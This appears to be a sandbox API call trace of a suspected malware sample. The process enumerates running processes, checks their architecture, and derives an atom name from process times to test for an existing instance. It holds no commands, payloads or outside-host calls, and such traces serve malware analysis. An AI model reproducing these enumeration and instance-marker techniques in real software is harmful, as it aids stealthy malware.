	[0127.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.376] CloseHandle (hObject=0x2dc) returned 1
	[0127.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.376] CloseHandle (hObject=0x2dc) returned 1
	[0127.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.376] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.376] CloseHandle (hObject=0x2dc) returned 1
	[0127.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.377] CloseHandle (hObject=0x2dc) returned 1
	[0127.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.377] CloseHandle (hObject=0x2dc) returned 1
	[0127.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.377] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.377] CloseHandle (hObject=0x2dc) returned 1
	[0127.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.378] CloseHandle (hObject=0x2dc) returned 1
	[0127.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.378] CloseHandle (hObject=0x2dc) returned 1
	[0127.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.378] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.378] CloseHandle (hObject=0x2dc) returned 1
	[0127.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.379] CloseHandle (hObject=0x2dc) returned 1
	[0127.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.379] CloseHandle (hObject=0x2dc) returned 1
	[0127.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.379] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.379] CloseHandle (hObject=0x2dc) returned 1
	[0127.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.380] CloseHandle (hObject=0x2dc) returned 1
	[0127.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.380] CloseHandle (hObject=0x2dc) returned 1
	[0127.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.380] CloseHandle (hObject=0x2dc) returned 1
	[0127.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.381] CloseHandle (hObject=0x2dc) returned 1
	[0127.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.381] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.382] GetLastError () returned 0x5
	[0127.383] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.383] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.383] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] GetLastError () returned 0x5
	[0127.383] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.384] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetLastError () returned 0x5
	[0127.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.386] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.386] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.386] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.386] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.386] CloseHandle (hObject=0x2dc) returned 1
	[0127.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.387] CloseHandle (hObject=0x2dc) returned 1
	[0127.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.387] CloseHandle (hObject=0x2dc) returned 1
	[0127.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.387] CloseHandle (hObject=0x2dc) returned 1
	[0127.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.388] CloseHandle (hObject=0x2dc) returned 1
	[0127.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.388] CloseHandle (hObject=0x2dc) returned 1
	[0127.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.424] CloseHandle (hObject=0x2dc) returned 1
	[0127.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.425] CloseHandle (hObject=0x2dc) returned 1
	[0127.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.426] CloseHandle (hObject=0x2dc) returned 1
	[0127.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.426] CloseHandle (hObject=0x2dc) returned 1
	[0127.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.427] CloseHandle (hObject=0x2dc) returned 1
	[0127.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.427] CloseHandle (hObject=0x2dc) returned 1
	[0127.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.427] CloseHandle (hObject=0x2dc) returned 1
	[0127.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
